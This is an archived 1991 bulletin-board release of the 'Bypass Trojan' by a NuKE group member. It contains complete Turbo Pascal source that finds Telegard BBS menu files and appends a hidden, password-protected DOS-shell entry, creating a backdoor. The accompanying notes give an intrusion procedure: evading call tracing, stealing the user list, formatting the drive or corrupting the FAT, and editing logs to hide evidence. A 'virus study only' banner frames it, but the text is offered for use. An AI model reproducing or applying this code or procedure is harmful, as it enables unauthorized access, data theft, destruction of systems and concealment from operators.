home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / BYPASS.ASM < prev    next >
Assembly Source File  |  1992-06-01  |  10KB  |  221 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ──────────────────────> Bypass Trojan v1.0 and v2.0 :
  25.  
  26.  Created by: Mechanix
  27.  Released  : October 1991
  28.  
  29.  Introduction:
  30.  
  31.     Well this is basically another backdoor creator for Telegard Systems. This
  32.  one is relatively fullproof except for the fact that it requires REMOTE.BAT to
  33.  exist on the target system, or it will not function properly. However, the
  34.  Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the
  35.  target system, if it doesn't exist already. This is why I am also releasing
  36.  the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the
  37.  source after the description.
  38.  
  39.  Description:
  40.  
  41.     This trojan will scan all directories on drives C: to E: in search of the
  42.  MAIN.MNU file. Then it will append a few lines to the file as to create a
  43.  hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is
  44.  Read-Only or Hidden, and will remove these attributes long enough to make the
  45.  changes. It will also check for write-protection. The source can also be
  46.  changed as to modify any of the .MNU files.
  47.  
  48.  Notes:
  49.  
  50.     This trojan uses a basic Turbo Pascal cycle to scan all directories and
  51.  files, and thus the source can be modified for a number of uses. As for a good
  52.  procedure to nail the board once the shell to DOS command has been
  53.  implemented, I recommend the following:
  54.   - First and foremost, use a PBX or other phreaking trick to avoid the
  55.     annoying Maestro phone.
  56.   - Call preferably around 4-5 am, when the SysOp is almost sure not to be
  57.     around.
  58.   - Use the shuttle password (if there is one) and then apply as a NEW user
  59.     after you have bypassed the shuttle password. This will usually bypass CBV
  60.     utilities.
  61.   - Shell to DOS in the correct menu.
  62.   - Turn your capture mode on, as to record everything you see.
  63.   - Go get the user list and ZIP it up with another ZIP file that is already
  64.     online. This way you can D/L it later when you log on again. Or capture it
  65.     through a text file viewing utility if you find one on the system.
  66.   - If you don't want the user list, and just want to crash the board, then
  67.     FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if
  68.     it's a H/P board, use one of the online virii or trojans to screw him. That
  69.     will teach him, and you get to test them out.
  70.   - If you decide to only take the user list and let the board live, then go
  71.     edit the logs as to remove all evidence of your actions. If there's a spool
  72.     to printer log, you're in trouble.
  73.   - If you could not bypass CBV, then find that utility's log and edit out
  74.     your number.
  75.   - Lastly, take off the DOS shell command from the menu you modified in the
  76.     first place, unless you want to use it again, but this is risky.
  77.  
  78.  Well that's the method I've been using, but the choice is your's.
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  Source:
  85.  
  86. PROGRAM BYPASS1;
  87. { Bypass Trojan v1.0                                                          }
  88. { Created by: Mε¢HÆ∩!X [NuKE]                                                 }
  89. { Created on: 27/09/91                                                        }
  90. USES DOS;
  91. VAR
  92.  Target  : SEARCHREC;
  93.  T       : TEXT;
  94. PROCEDURE DIRECT   (PATH : STRING);
  95. VAR
  96.  PATH2    : STRING;
  97.  INFO     : SEARCHREC;
  98.  INFO2    : SEARCHREC;
  99.  F        : TEXT;
  100. BEGIN
  101.  Findfirst (PATH + '\*.*',$10,INFO);
  102.  WHILE DOSERROR = 0 DO
  103.   BEGIN
  104.    IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN
  105.     Begin
  106.      PATH2 := PATH + '\' + INFO.NAME;
  107.       Chdir (PATH2);
  108.        Findfirst ('MAIN.MNU',($3F - $10),INFO2);       { Or any .MNU you wish }
  109.        WHILE DOSERROR = 0 DO
  110.         Begin
  111.          ASSIGN (F,INFO2.NAME);
  112.          Setfattr (F,$20);
  113.          Append (F);
  114.          Writeln (F,' ');
  115.          Writeln (F,' ');
  116.          Writeln (F,'#');                                        { Key to add }
  117.          Writeln (F,' ');
  118.          Writeln (F,'-$');
  119.          Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!');      { Password }
  120.          Writeln (F,' ');
  121.          Writeln (F,' ');
  122.          Writeln (F,' ');
  123.          Writeln (F,'#');                                        { Key to add }
  124.          Writeln (F,' ');
  125.          Writeln (F,'D-');
  126.          Writeln (F,'REMOTE.BAT');
  127.          Close (F);
  128.          Findnext(INFO2);
  129.        End;
  130.       DIRECT (PATH2);
  131.     End;
  132.    Findnext(INFO);
  133.   End;
  134.  END;
  135. PROCEDURE FILEFIND (DRIVE : CHAR);
  136. BEGIN
  137.  Chdir (DRIVE + ':\');
  138.  Findfirst ('MAIN.MNU',($3F - $10),Target);            { Or any .MNU you wish }
  139.  WHILE DOSERROR = 0 DO
  140.   Begin
  141.    ASSIGN (T,Target.name);
  142.    Setfattr (T,$20);
  143.    {$I-}
  144.    Append (T);
  145.    {$I+}
  146.    IF IORESULT = 0 THEN
  147.     Begin
  148.      Writeln (T,' ');
  149.      Writeln (T,'#');                                            { Key to add }
  150.      Writeln (T,' ');
  151.      Writeln (T,'-$');
  152.      Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!');          { Password }
  153.      Writeln (T,' ');
  154.      Writeln (T,' ');
  155.      Writeln (T,' ');
  156.      Writeln (T,'#');                                            { Key to add }
  157.      Writeln (T,' ');
  158.      Writeln (T,'D-');
  159.      Writeln (T,'REMOTE.BAT');
  160.      Close (T);
  161.     End
  162.    ELSE
  163.     Exit;
  164.    Findnext (Target);
  165.   End;
  166.  DIRECT  (DRIVE + ':');
  167. END;
  168. BEGIN
  169.  {$I-}
  170.  Chdir ('C:\');
  171.  {$I+}
  172.  IF IORESULT = 0 THEN
  173.   FILEFIND ('C');
  174.  {$I-}
  175.  Chdir ('D:\');
  176.  {$I+}
  177.  IF IORESULT = 0 THEN
  178.   FILEFIND ('D');
  179.  {$I-}
  180.  Chdir ('E:\');
  181.  {$I+}
  182.  IF IORESULT = 0 THEN
  183.   FILEFIND ('E');
  184. END.
  185.  
  186.     Well there it is. Please feel free to improve it in anyway you like. I will
  187.  soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and
  188.  creates one if needed. The REMOTE.BAT file also has the Hidden attribute to
  189.  try and hide it from the SysOp. The reason for this, is that smart SysOps, and
  190.  any of those who are reading this, rename the REMOTE.BAT or remove it, to
  191.  avoid this sort of trojan. The original release is for a modem on Com2. If you
  192.  wish to have the trojan for another device, either edit it in the .EXE, or
  193.  contact me (Mechanix) on any [NuKE] board, and I will recompile the source for
  194.  you with another device.
  195.  
  196.  Mechanix [NuKE]
  197.  
  198. ;****************************************************************************;
  199. ;                                                                            ;
  200. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  201. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  202. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  203. ;                     -=]                            [=-                     ;
  204. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  205. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  206. ;                     -=]                            [=-                     ;
  207. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  208. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  209. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  210. ;                                                                            ;
  211. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  212. ;                                                                            ;
  213. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  214. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  215. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  216. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  217. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  218. ; Is. Keep This Code in Responsible Hands!                                   ;
  219. ;                                                                            ;
  220. ;****************************************************************************;
  221.